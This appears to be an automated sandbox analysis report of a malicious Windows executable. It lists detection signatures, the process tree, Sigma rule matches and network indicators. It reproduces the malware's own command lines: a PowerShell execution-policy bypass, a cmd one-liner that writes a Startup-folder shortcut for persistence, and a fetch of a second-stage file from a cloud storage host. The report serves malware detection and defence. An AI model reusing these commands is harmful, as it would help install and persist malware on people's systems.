Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T6l6gPxwQU.exe

Overview

General Information

Sample name:T6l6gPxwQU.exe
renamed because original name is a hash value
Original sample name:fca042b18adf613d9a2be1646663698f.exe
Analysis ID:1528376
MD5:fca042b18adf613d9a2be1646663698f
SHA1:a7c91cd17ceeb8b1d0ac9873723f2b35487ca50c
SHA256:3e358ac78679758f3720dd60d4e5fdff8323f2de436add34238d39c9bf969460
Tags:64exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • T6l6gPxwQU.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\T6l6gPxwQU.exe" MD5: FCA042B18ADF613D9A2BE1646663698F)
    • powershell.exe (PID: 7364 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • InformationCheck.exe (PID: 7604 cmdline: "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • cmd.exe (PID: 7660 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7904 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 8028 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: C56B5F0201A3B3DE53E561FE76912BFD)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 , CommandLine: "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\InformationCheck.exe, NewProcessName: C:\Users\Public\InformationCheck.exe, OriginalFileName: C:\Users\Public\InformationCheck.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7364, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 , ProcessId: 7604, ProcessName: InformationCheck.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\T6l6gPxwQU.exe", ParentImage: C:\Users\user\Desktop\T6l6gPxwQU.exe, ParentProcessId: 7348, ParentProcessName: T6l6gPxwQU.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", ProcessId: 7364, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 , ParentImage: C:\Users\Public\InformationCheck.exe, ParentProcessId: 7604, ParentProcessName: InformationCheck.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 7660, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\T6l6gPxwQU.exe", ParentImage: C:\Users\user\Desktop\T6l6gPxwQU.exe, ParentProcessId: 7348, ParentProcessName: T6l6gPxwQU.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", ProcessId: 7364, ProcessName: powershell.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7904, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7364, TargetFilename: C:\Users\Public\Details.au3
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\T6l6gPxwQU.exe", ParentImage: C:\Users\user\Desktop\T6l6gPxwQU.exe, ParentProcessId: 7348, ParentProcessName: T6l6gPxwQU.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", ProcessId: 7364, ProcessName: powershell.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7904, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 8028, ProcessName: SwiftWrite.pif
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7904, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\T6l6gPxwQU.exe", ParentImage: C:\Users\user\Desktop\T6l6gPxwQU.exe, ParentProcessId: 7348, ParentProcessName: T6l6gPxwQU.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1", ProcessId: 7364, ProcessName: powershell.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7660, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: T6l6gPxwQU.exeReversingLabs: Detection: 42%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: T6l6gPxwQU.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 83.140.241.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: T6l6gPxwQU.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF6BB19BC70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF6BB1A72A8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1A71F4 FindFirstFileW,FindClose,0_2_00007FF6BB1A71F4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF6BB19B7C0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB162F50 FindFirstFileExW,0_2_00007FF6BB162F50
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF6BB1AA4F8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF6BB1AA350
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1A6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF6BB1A6428
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF6BB1AA874
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB19C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF6BB19C7C0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00594005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00594005
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059494A GetFileAttributesW,FindFirstFileW,FindClose,3_2_0059494A
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0059C2FF
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059CD14 FindFirstFileW,FindClose,3_2_0059CD14
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_0059CD9F
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0059F5D8
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0059F735
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0059FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0059FA36
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00593CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_00593CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_00904005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00904005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_0090494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0090C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0090CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090CD14 FindFirstFileW,FindClose,10_2_0090CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0090F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0090F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_0090FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0090FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 10_2_00903CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00903CE2
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /v1/ws2/:stream2/:small/small.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: my.cloudme.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\T6l6gPxwQU.exeCode function: 0_2_00007FF6BB1AE968 InternetQueryDataAvailable,InternetReadFile,0_2_00007FF6BB1AE968
Source: global trafficHTTP traffic detected: GET /v1/ws2/:stream2/:small/small.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: my.cloudme.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: my.cloudme.com
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000001.00000002.1768096648.000002BB015FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1768096648.000002BB0117C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.cloHJ
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1768096648.000002BB01365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1768096648.000002BB00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1768096648.000002BB01365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.cloudme.com/v1/ws2/:stream2/:small/small.txt
Source: powershell.exe, 00000001.00000002.1768096648.000002BB018FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
